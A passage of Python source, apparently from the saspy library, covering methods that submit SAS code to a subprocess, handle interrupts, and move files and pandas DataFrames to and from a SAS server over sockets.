return lst.replace(chr(12), '\n')
def _asubmit(self, code, results="html"):
# as this is an _ method, it's not really to be used. Of note is that if this is used and if what it submitted generates
# anything to the lst, then unless _getlst[txt] is called, then next submit will happen to get the lst this wrote, plus
# what it generates. If the two are not of the same type (html, text) it could be problematic, beyond not being what was
# expected in the first place. __flushlst__() used to be used, but was never needed. Adding this note and removing the
# unnecessary read in submit as this can't happen in the current code.
odsopen = b"ods listing close;ods "+self.sascfg.output.encode()+ \
b" (id=saspy_internal) file=stdout options(bitmap_mode='inline') device=svg style="+self._sb.HTML_Style.encode()+ \
b"; ods graphics on / outputfmt=png;\n"
odsclose = b"ods "+self.sascfg.output.encode()+b" (id=saspy_internal) close;ods listing;\n"
ods = True;
if results.upper() != "HTML":
ods = False
if (ods):
self.stdin.write(odsopen)
out = self.stdin.write(code.encode(self.sascfg.encoding)+b'\n')
if (ods):
self.stdin.write(odsclose)
self.stdin.flush()
return str(out)
def submit(self, code: str, results: str ="html", prompt: dict = None, **kwargs) -> dict:
'''
This method is used to submit any SAS code. It returns the Log and Listing as a python dictionary.
code - the SAS statements you want to execute
results - format of results, HTML is default, TEXT is the alternative
prompt - dict of names:flags to prompt for; create macro variables (used in submitted code), then keep or delete
The keys are the names of the macro variables and the boolean flag is to either hide what you type and delete
the macros, or show what you type and keep the macros (they will still be available later)
for example (what you type for pw will not be displayed, user and dsname will):
results = sas.submit(
"""
libname tera teradata server=teracop1 user=&user pw=&pw;
proc print data=tera.&dsname (obs=10); run;
""" ,
prompt = {'user': False, 'pw': True, 'dsname': False}
)
Returns - a Dict containing two keys:values, [LOG, LST]. LOG is text and LST is 'results' (HTML or TEXT)
NOTE: to view HTML results in the ipykernel, issue: from IPython.display import HTML and use HTML() instead of print()
i.e,: results = sas.submit("data a; x=1; run; proc print;run')
print(results['LOG'])
HTML(results['LST'])
'''
prompt = prompt if prompt is not None else {}
printto = kwargs.pop('undo', False)
odsopen = b"ods listing close;ods "+self.sascfg.output.encode()+ \
b" (id=saspy_internal) file=stdout options(bitmap_mode='inline') device=svg style="+self._sb.HTML_Style.encode()+ \
b"; ods graphics on / outputfmt=png;\n"
odsclose = b"ods "+self.sascfg.output.encode()+b" (id=saspy_internal) close;ods listing;\n"
ods = True;
mj = b";*\';*\";*/;"
lstf = b''
logf = b''
bail = False
eof = 5
bc = False
done = False
logn = self._logcnt()
#logcodei = "%put E3969440A681A24088859985" + logn + ";"
#logcodeo = b"\nE3969440A681A24088859985" + logn.encode()
logcodei = "%put %upcase(e3969440a681a24088859985" + logn + ");"
logcodeo = b"E3969440A681A24088859985" + logn.encode()
pcodei = ''
pcodeiv = ''
pcodeo = ''
undo = b'proc printto;run;\n' if printto else b''
if self.pid == None:
self._sb.SASpid = None
print("No SAS process attached. SAS process has terminated unexpectedly.")
return dict(LOG="No SAS process attached. SAS process has terminated unexpectedly.", LST='')
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return dict(LOG='SAS process has terminated unexpectedly. Pid State= '+str(rc), LST='')
# to cover the possibility of an _asubmit w/ lst output not read; no known cases now; used to be __flushlst__()
# removing this and adding comment in _asubmit to use _getlst[txt] so this will never be necessary; delete later
#while(len(self.stdout.read1(4096)) > 0):
# continue
if results.upper() != "HTML":
ods = False
if len(prompt):
pcodei += 'options nosource nonotes;\n'
pcodeo += 'options nosource nonotes;\n'
for key in prompt:
gotit = False
while not gotit:
var = self.sascfg._prompt('Please enter value for macro variable '+key+' ', pw=prompt[key])
if var is None:
raise RuntimeError("No value for prompted macro variable provided.")
if len(var) > 0:
gotit = True
else:
print("Sorry, didn't get a value for that variable.")
if prompt[key]:
pcodei += '%let '+key+'='+var+';\n'
pcodeo += '%symdel '+key+';\n'
else:
pcodeiv += '%let '+key+'='+var+';\n'
pcodei += 'options source notes;\n'
pcodeo += 'options source notes;\n'
if ods:
self.stdin.write(odsopen)
pgm = mj+b'\n'+pcodei.encode(self.sascfg.encoding)+pcodeiv.encode(self.sascfg.encoding)
pgm += code.encode(self.sascfg.encoding)+b'\n'+pcodeo.encode(self.sascfg.encoding)+b'\n'+mj
out = self.stdin.write(pgm)
if ods:
self.stdin.write(odsclose)
out = self.stdin.write(undo+logcodei.encode(self.sascfg.encoding)+b'\n')
self.stdin.flush()
bof = False
while not done:
try:
while True:
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
log = b''
try:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
self._log += logf.decode(self.sascfg.encoding, errors='replace')
except:
pass
self.pid = None
self._sb.SASpid = None
return dict(LOG='SAS process has terminated unexpectedly. Pid State= ' +
str(rc)+'\n'+logf.decode(self.sascfg.encoding, errors='replace'), LST='')
if bail:
eof -= 1
if eof < 0:
break
if os.name == 'nt':
try:
lst = self.stdout.get_nowait()
except Empty:
lst = b''
else:
lst = self.stdout.read1(4096)
if len(lst) > 0:
lstf += lst
if ods and not bof and lstf.count(b"<!DOCTYPE html>", 0, 20) > 0:
bof = True
else:
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
if not bail and bc:
self.stdin.write(undo+odsclose+logcodei.encode(self.sascfg.encoding)+b'\n')
self.stdin.flush()
bc = False
if not bail and logf.count(logcodeo) >= 1:
if ods:
lenf = len(lstf)
if lenf > 20 and bof:
if lstf.count(b"</html>", (lenf - 15), lenf):
bail = True
else:
bail = True
done = True
except (ConnectionResetError):
log = ''
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
try:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
self._log += logf.decode(self.sascfg.encoding, errors='replace')
except:
pass
rc = 0
if os.name == 'nt':
try:
rc = self.pid.wait(0)
except:
pass
else:
rc = os.waitpid(self.pid, 0)
self.pid = None
self._sb.SASpid = None
log = logf.partition(logcodeo)[0]+b'\nConnection Reset: SAS process has terminated unexpectedly. Pid State= '+str(rc).encode()+b'\n'+logf
return dict(LOG=log.encode(), LST='')
except (KeyboardInterrupt, SystemExit):
if not self._sb.sascfg.prompt:
raise KeyboardInterrupt("Interupt handling is disabled due to prompting being disabled.")
print('Exception caught!')
ll = self._breakprompt(logcodeo)
if ll.get('ABORT', False):
return ll
logf += ll['LOG']
lstf += ll['LST']
bc = ll['BC']
if not bc:
print('Exception handled :)\n')
else:
print('Exception ignored, continuing to process...\n')
self.stdin.write(undo+odsclose+logcodei.encode(self.sascfg.encoding)+b'\n')
self.stdin.flush()
if ods:
try:
lstf = lstf.decode()
except UnicodeDecodeError:
try:
lstf = lstf.decode(self.sascfg.encoding)
except UnicodeDecodeError:
lstf = lstf.decode(errors='replace')
else:
lstf = lstf.decode(self.sascfg.encoding, errors='replace')
logf = logf.decode(self.sascfg.encoding, errors='replace').replace(chr(12), chr(10))
trip = lstf.rpartition("/*]]>*/")
if len(trip[1]) > 0 and len(trip[2]) < 200:
lstf = ''
self._log += logf
final = logf.partition(logcodei)
z = final[0].rpartition(chr(10))
prev = '%08d' % (self._log_cnt - 1)
zz = z[0].rpartition("E3969440A681A24088859985" + prev)
logd = zz[2].replace(mj.decode(self.sascfg.encoding), '').replace(chr(12), chr(10))
lstd = lstf.replace(chr(12), chr(10)).replace('<body class="c body">',
'<body class="l body">').replace("font-size: x-small;",
"font-size: normal;")
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
self._sb._lastlog = logd
return dict(LOG=logd, LST=lstd)
def _breakprompt(self, eos):
found = False
logf = b''
lstf = b''
bc = False
if self.pid is None:
self._sb.SASpid = None
return dict(LOG="No SAS process attached. SAS process has terminated unexpectedly.", LST='', ABORT=True)
if self.sascfg.ssh:
response = self.sascfg._prompt(
"SAS attention handling not supported over ssh. Please enter (T) to terminate SAS or (C) to continue.")
while True:
if response is None or response.upper() == 'C':
return dict(LOG=b'', LST=b'', BC=True)
if response.upper() == 'T':
break
response = self.sascfg._prompt("Please enter (T) to terminate SAS or (C) to continue.")
if os.name == 'nt':
self.pid.kill()
else:
interrupt = signal.SIGINT
os.kill(self.pid, interrupt)
sleep(.25)
while True:
if os.name == 'nt':
try:
rc = self.pid.wait(0)
except:
pass
self.pid = None
self._sb.SASpid = None
return dict(LOG='SAS process has terminated unexpectedly. RC from wait was: '+str(rc), LST='',ABORT=True)
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
outrc = str(rc)
return dict(LOG='SAS process has terminated unexpectedly. Pid State= '+outrc, LST='',ABORT=True)
lst = self.stdout.read1(4096)
lstf += lst
if len(lst) > 0:
lsts = lst.rpartition(b'Select:')
if lsts[0] != b'' and lsts[1] != b'':
found = True
query = lsts[1] + lsts[2].rsplit(b'\n?')[0] + b'\n'
print('Processing interrupt\nAttn handler Query is\n\n' + query.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if (response == 'C' or response == 'c') and query.count("C. Cancel") >= 1:
bc = True
break
else:
lsts = lst.rpartition(b'Press')
if lsts[0] != b'' and lsts[1] != b'':
query = lsts[1] + lsts[2].rsplit(b'\n?')[0] + b'\n'
print('Secondary Query is:\n\n' + query.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if (response == 'N' or response == 'n') and query.count("N to continue") >= 1:
bc = True
break
else:
print("******************No 'Select' or 'Press' found. Here's what was found.")
found = True
print('Processing interrupt\nAttn handler Query is\n\n' + lst.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: or N/A only if there are no choices: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if response in ['N/A', '']:
break
found = True
bc = True
else:
log = self.stderr.read1(4096)
logf += log
self._log += log.decode(self.sascfg.encoding, errors='replace')
if log.count(eos) >= 1:
print("******************Found end of step. No interrupt processed")
found = True
if found:
break
sleep(.25)
lstr = lstf
logr = logf
return dict(LOG=logr, LST=lstr, BC=bc)
def _break(self, inlst=''):
found = False
lst = inlst
interupt = signal.SIGINT
os.kill(self.pid, interupt)
sleep(.25)
self._asubmit('','text')
while True:
if len(lst) > 0:
lsts = lst.rpartition('Select:')
if lsts[0] != '' and lsts[1] != '':
found = True
print('Processing interupt\nAttn handler Query is\n\n'+lsts[1]+lsts[2].rsplit('\n?')[0]+'\n')
opt = lsts[2].partition('Cancel Submitted Statements')
if opt[0] != '' and opt[1] != '':
response = opt[0].rpartition('.')[0].rpartition(' ')[2]
else:
opt = lsts[2].partition('Halt DATA')
if opt[0] != '' and opt[1] != '':
response = opt[0].rpartition('.')[0].rpartition(' ')[2]
else:
opt = lsts[2].partition('Cancel the dialog')
if opt[0] != '' and opt[1] != '':
response = opt[0].rpartition('.')[0].rpartition(' ')[2]
else:
print("Unknown 'Select' choices found: ")
response = ''
print("'Select' Response="+response+'\n')
self._asubmit(response+'\n','text')
else:
lsts = lst.rpartition('Press')
if lsts[0] != '' and lsts[1] != '':
print('Seconday Query is:\n\n'+lsts[1]+lsts[2].rsplit('\n?')[0]+'\n')
opt = lsts[2].partition(' to exit ')
if opt[0] != '' and opt[1] != '':
response = opt[0].rpartition(' ')[2]
else:
opt = lsts[2].partition('N to continue')
if opt[0] != '' and opt[1] != '':
response = 'Y'
else:
response = 'X'
print("'Press' Response="+response+'\n')
self._asubmit(response+'\n','text')
else:
#print("******************No 'Select' or 'Press' found in lst=")
pass
sleep(.25)
lst = self.stdout.read1(4096).decode(self.sascfg.encoding, errors='replace')
else:
log = self.stderr.read1(4096).decode(self.sascfg.encoding, errors='replace')
self._log += log
logn = self._logcnt(False)
if log.count("E3969440A681A24088859985"+logn+"\n") >= 1:
print("******************Found end of step. No interupt processed")
found = True
if found:
ll = self.submit("ods "+self.sascfg.output+" (id=saspy_internal) close;ods listing close;ods listing;libname work list;\n",'text')
break
sleep(.25)
lst = self.stdout.read1(4096).decode(self.sascfg.encoding, errors='replace')
return log
def saslog(self):
"""
this method is used to get the current, full contents of the SASLOG
"""
return self._log
def exist(self, table: str, libref: str ="") -> bool:
"""
table - the name of the SAS Data Set
libref - the libref for the Data Set, defaults to WORK, or USER if assigned
Returns True it the Data Set exists and False if it does not
"""
code = 'data _null_; e = exist("'
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n"+'"'+");\n"
code += 'v = exist("'
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n"+'"'+", 'VIEW');\n if e or v then e = 1;\n"
code += "put 'TABLE_EXISTS=' e 'TAB_EXTEND=';run;"
ll = self.submit(code, "text")
exists = int(ll['LOG'].rpartition("TABLE_EXISTS=")[2].rpartition(" TAB_EXTEND=")[0])
return bool(exists)
def read_csv(self, file: str, table: str, libref: str ="", nosub: bool =False, opts: dict = None) -> '<SASdata object>':
"""
This method will import a csv file into a SAS Data Set and return the SASdata object referring to it.
file - eithe the OS filesystem path of the file, or HTTP://... for a url accessible file
table - the name of the SAS Data Set to create
libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
opts - a dictionary containing any of the following Proc Import options(datarow, delimiter, getnames, guessingrows)
"""
opts = opts if opts is not None else {}
code = "filename x "
if file.lower().startswith("http"):
code += "url "
code += "\""+file+"\";\n"
code += "proc import datafile=x out="
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n dbms=csv replace; "+self._sb._impopts(opts)+" run;"
if nosub:
print(code)
else:
ll = self.submit(code, "text")
def write_csv(self, file: str, table: str, libref: str ="", nosub: bool =False, dsopts: dict = None, opts: dict = None) -> 'The LOG showing the results of the step':
"""
This method will export a SAS Data Set to a file in CSV format.
file - the OS filesystem path of the file to be created (exported from the SAS Data Set)
table - the name of the SAS Data Set you want to export to a CSV file
libref - the libref for the SAS Data Set.
dsopts - a dictionary containing any of the following SAS data set options(where, drop, keep, obs, firstobs)
opts - a dictionary containing any of the following Proc Export options(delimiter, putnames)
"""
dsopts = dsopts if dsopts is not None else {}
opts = opts if opts is not None else {}
code = "filename x \""+file+"\";\n"
code += "options nosource;\n"
code += "proc export data="
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n "+self._sb._dsopts(dsopts)+" outfile=x dbms=csv replace;\n"
code += self._sb._expopts(opts)+" run;\n"
code += "options source;\n"
if nosub:
print(code)
else:
ll = self.submit(code, "text")
return ll['LOG']
def upload_slow(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
"""
This method uploads a local file to the SAS servers file system.
localfile - path to the local file to upload
remotefile - path to remote file to create or overwrite
overwrite - overwrite the output file if it exists?
permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
remf = remotefile
else:
if valid == {}:
remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
else:
remf = remotefile
if overwrite == False:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}
try:
fd = open(localfile, 'rb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
data _null_;
file saspydir;
infile datalines;
input;
lin = length(_infile_);
outdata = inputc(_infile_, '$hex.', lin);
lout = lin/2;
put outdata $varying80. lout;
datalines4;"""
buf = fd.read1(40)
if len(buf):
self._asubmit(code, "text")
else:
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
data _null_;
fid = fopen('saspydir', 'O');
if fid then
rc = fclose(fid);
run;\n"""
ll = self.submit(code, 'text')
fd.close()
return {'Success' : True,
'LOG' : ll['LOG']}
while len(buf):
buf2 = ''
for i in range(len(buf)):
buf2 += '%02x' % buf[i]
self.stdin.write(buf2.encode()+b'\n')
buf = fd.read1(40)
self._asubmit(";;;;", "text")
ll = self.submit("run;\nfilename saspydir;", 'text')
fd.close()
return {'Success' : True,
'LOG' : ll['LOG']}
def upload(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
"""
This method uploads a local file to the SAS servers file system.
localfile - path to the local file to upload
remotefile - path to remote file to create or overwrite
overwrite - overwrite the output file if it exists?
permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
remf = remotefile
else:
if valid == {}:
remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
else:
remf = remotefile
if overwrite == False:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}
port = kwargs.get('port', 0)
if self.sascfg.ssh and self.sascfg.rtunnel and port == 0:
# we are using a rtunnel; default to that port
port = self.sascfg.rtunnel
host = 'localhost'
else:
return self._upload_client(localfile, remotefile, overwrite, permission, **kwargs)
try:
fd = open(localfile, 'rb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
filename sock socket ':"""+str(port)+"""' server reconn=0 recfm=S lrecl=4096;
data _null_; nb = -1;
infile sock nbyte=nb;
file saspydir;
input;
put _infile_;
run;
filename saspydir;
filename sock;\n"""
self._asubmit(code, "text")
sock = socks.socket()
sock.connect((host, port))
done = False
while not done:
try:
while True:
buf = fd.read1(4096)
sent = 0
send = len(buf)
blen = send
if blen:
while send:
try:
sent = 0
sent = sock.send(buf[blen-send:blen])
except (BlockingIOError):
pass
except (OSError):
sock.close()
fd.close()
sock = socks.socket()
sock.connect((host, port))
fd = open(localfile, 'rb')
sleep(.5)
break
send -= sent
else:
done = True
sock.shutdown(socks.SHUT_RDWR)
sock.close()
fd.close()
break
except (KeyboardInterrupt, Exception) as e:
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
ll = self.submit("", 'text')
return {'Success' : True,
'LOG' : ll['LOG']}
def _upload_client(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
"""
This method uploads a local file to the SAS servers file system.
localfile - path to the local file to upload
remotefile - path to remote file to create or overwrite
overwrite - overwrite the output file if it exists?
permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
remf = remotefile
else:
if valid == {}:
remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
else:
remf = remotefile
if overwrite == False:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}
port = kwargs.get('port', 0)
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if self.sascfg.ssh:
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
else:
host = ''
try:
fd = open(localfile, 'rb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
return {'Success' : False,
'LOG' : "Error try to open a socket in the upload method. Call failed."}
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S lrecl=4096;
/* filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S encoding=binary lrecl=4096; */
data _null_; nb = -1;
infile sock nbyte=nb;
file saspydir;
input;
put _infile_;
run;
filename saspydir;
filename sock;\n"""
sock.listen(1)
self._asubmit(code, 'text')
if sel.select([sock],[],[],10)[0] == []:
print("error occured in SAS during upload. Check the returned LOG for issues.")
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Failure in upload.\n"+ll['LOG']}
newsock = (0,0)
try:
newsock = sock.accept()
while True:
buf = fd.read1(4096)
sent = 0
send = len(buf)
blen = send
if blen:
while send:
try:
sent = 0
sent = newsock[0].send(buf[blen-send:blen])
except (BlockingIOError):
pass
send -= sent
else:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
fd.close()
break
except (KeyboardInterrupt, Exception) as e:
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
ll = self.submit("", 'text')
return {'Success' : True,
'LOG' : ll['LOG']}
def download(self, localfile: str, remotefile: str, overwrite: bool = True, **kwargs):
"""
This method downloads a remote file from the SAS servers file system.
localfile - path to the local file to create or overwrite
remotefile - path to remote file tp dpwnload
overwrite - overwrite the output file if it exists?
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" does not exist."}
if valid == {}:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" is a directory."}
if os.path.isdir(localfile):
locf = localfile + os.sep + remotefile.rpartition(self._sb.hostsep)[2]
else:
locf = localfile
try:
fd = open(locf, 'wb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(locf)+" could not be opened. Error was: "+str(e)}
port = kwargs.get('port', 0)
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
return {'Success' : False,
'LOG' : "Error try to open a socket in the download method. Call failed."}
if self.sascfg.ssh:
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
else:
host = ''
code = """
filename saspydir '"""+remotefile+"""' recfm=F encoding=binary lrecl=4096;
filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S lrecl=4096;
/* filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S encoding=binary; */
data _null_;
file sock;
infile saspydir;
input;
put _infile_;
run;\n"""
sock.listen(1)
self._asubmit(code, 'text')
if sel.select([sock],[],[],10)[0] == []:
print("error occured in SAS during download. Check the returned LOG for issues.")
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Failure in download.\n"+ll['LOG']}
datar = b''
newsock = (0,0)
try:
newsock = sock.accept()
while True:
data = newsock[0].recv(4096)
if len(data):
datar += data
else:
if len(datar):
fd.write(datar)
break
if len(datar) > 8300:
fd.write(datar[:8192])
datar = datar[8192:]
except (KeyboardInterrupt, Exception) as e:
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
fd.close()
ll = self.submit("filename saspydir;", 'text')
return {'Success' : False,
'LOG' : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
fd.flush()
fd.close()
ll = self.submit("filename saspydir;", 'text')
return {'Success' : True,
'LOG' : ll['LOG']}
def _getbytelenF(self, x):
return len(x.encode(self.sascfg.encoding))
def _getbytelenR(self, x):
return len(x.encode(self.sascfg.encoding, errors='replace'))
def dataframe2sasdata(self, df: '<Pandas Data Frame object>', table: str ='a',
libref: str ="", keep_outer_quotes: bool=False,
embedded_newlines: bool=True,
LF: str = '\x01', CR: str = '\x02',
colsep: str = '\x03', colrep: str = ' ',
datetimes: dict={}, outfmts: dict={}, labels: dict={},
outdsopts: dict={}, encode_errors = None, char_lengths = None,
**kwargs):
"""
This method imports a Pandas Data Frame to a SAS Data Set, returning the SASdata object for the new Data Set.
df - Pandas Data Frame to import to a SAS Data Set
table - the name of the SAS Data Set to create
libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
keep_outer_quotes - for character columns, have SAS keep any outer quotes instead of stripping them off.
embedded_newlines - if any char columns have embedded CR or LF, set this to True to get them iported into the SAS data set
LF - if embedded_newlines=True, the chacter to use for LF when transferring the data; defaults to '\x01'
CR - if embedded_newlines=True, the chacter to use for CR when transferring the data; defaults to '\x02'
colsep - the column seperator character used for streaming the delimmited data to SAS defaults to '\x03'
datetimes - dict with column names as keys and values of 'date' or 'time' to create SAS date or times instead of datetimes
outfmts - dict with column names and SAS formats to assign to the new SAS data set
labels - dict with column names and SAS Labels to assign to the new SAS data set
outdsopts - a dictionary containing output data set options for the table being created
encode_errors - 'fail' or 'replace' - default is to 'fail', other choice is to 'replace' invalid chars with the replacement char
char_lengths - How to determine (and declare) lengths for CHAR variables in the output SAS data set
"""
input = ""
xlate = ""
card = ""
format = ""
length = ""
label = ""
dts = []
ncols = len(df.columns)
lf = "'"+'%02x' % ord(LF.encode(self.sascfg.encoding))+"'x"
cr = "'"+'%02x' % ord(CR.encode(self.sascfg.encoding))+"'x "
delim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x "
dts_upper = {k.upper():v for k,v in datetimes.items()}
dts_keys = dts_upper.keys()
fmt_upper = {k.upper():v for k,v in outfmts.items()}
fmt_keys = fmt_upper.keys()
lab_upper = {k.upper():v for k,v in labels.items()}
lab_keys = lab_upper.keys()
if encode_errors is None:
encode_errors = 'fail'
if type(char_lengths) is not dict or len(char_lengths) < ncols:
charlens = self._sb.df_char_lengths(df, encode_errors, char_lengths)
else:
charlens = char_lengths
if charlens is None:
return -1
chr_upper = {k.upper():v for k,v in charlens.items()}
if type(df.index) != pd.RangeIndex:
warnings.warn("Note that Indexes are not transferred over as columns. Only actual coulmns are transferred")
for name in df.columns:
colname = str(name)
col_up = colname.upper()
input += "'"+colname+"'n "
if col_up in lab_keys:
label += "label '"+colname+"'n ="+lab_upper[col_up]+";\n"
if col_up in fmt_keys:
format += "'"+colname+"'n "+fmt_upper[col_up]+" "
if df.dtypes[name].kind in ('O','S','U','V'):
try:
length += " '"+colname+"'n $"+str(chr_upper[col_up])
except KeyError as e:
print("Dictionary provided as char_lengths is missing column: "+colname)
raise e
if keep_outer_quotes:
input += "~ "
dts.append('C')
if embedded_newlines:
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0A'x, "+lf+");\n"
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0D'x, "+cr+");\n"
else:
if df.dtypes[name].kind in ('M'):
length += " '"+colname+"'n 8"
input += ":B8601DT26.6 "
if col_up not in dts_keys:
if col_up not in fmt_keys:
format += "'"+colname+"'n E8601DT26.6 "
else:
if dts_upper[col_up].lower() == 'date':
if col_up not in fmt_keys:
format += "'"+colname+"'n E8601DA. "
xlate += " '"+colname+"'n = datepart('"+colname+"'n);\n"
else:
if dts_upper[col_up].lower() == 'time':
if col_up not in fmt_keys:
format += "'"+colname+"'n E8601TM. "
xlate += " '"+colname+"'n = timepart('"+colname+"'n);\n"
else:
print("invalid value for datetimes for column "+colname+". Using default.")
if col_up not in fmt_keys:
format += "'"+colname+"'n E8601DT26.6 "
dts.append('D')
else:
length += " '"+colname+"'n 8"
if df.dtypes[name] == 'bool':
dts.append('B')
else:
dts.append('N')
port = kwargs.get('port', 0)
if self.sascfg.ssh and self.sascfg.rtunnel and port == 0:
# we are using a rtunnel; default to that port
server = True
port = self.sascfg.rtunnel
host = 'localhost'
code = """filename sock socket ':"""+str(port)+"""' server reconn=0 recfm=V termstr=LF;\n"""
else:
server = False
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if self.sascfg.ssh:
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
else:
host = ''
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError as e:
raise e
code = """filename sock socket '"""+host+""":"""+str(port)+"""' recfm=V termstr=LF;\n"""
code += "data "
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n"
if len(outdsopts):
code += '('
for key in outdsopts:
code += key+'='+str(outdsopts[key]) + ' '
code += ");\n"
else:
code += ";\n"
if len(length):
code += "length"+length+";\n"
if len(format):
code += "format "+format+";\n"
code += label
code += "infile sock nbyte=nb delimiter="+delim+" STOPOVER;\ninput @;\nif _infile_ = '' then delete;\n"
code += "else do;\n input "+input+";\n"+xlate+";\nend;\nrun;\nfilename sock;\n"
if not server:
sock.listen(1)
self._asubmit(code, "text")
if server:
sleep(1)
sock = socks.socket()
sock.connect((host, port))
ssock = sock
if not server:
if sel.select([sock],[],[],10)[0] == []:
print("error occured in SAS during data transfer. Check the LOG for issues.")
sock.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Failure in upload.\n"+ll['LOG']}
newsock = (0,0)
try:
newsock = sock.accept()
except (KeyboardInterrupt, Exception) as e:
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
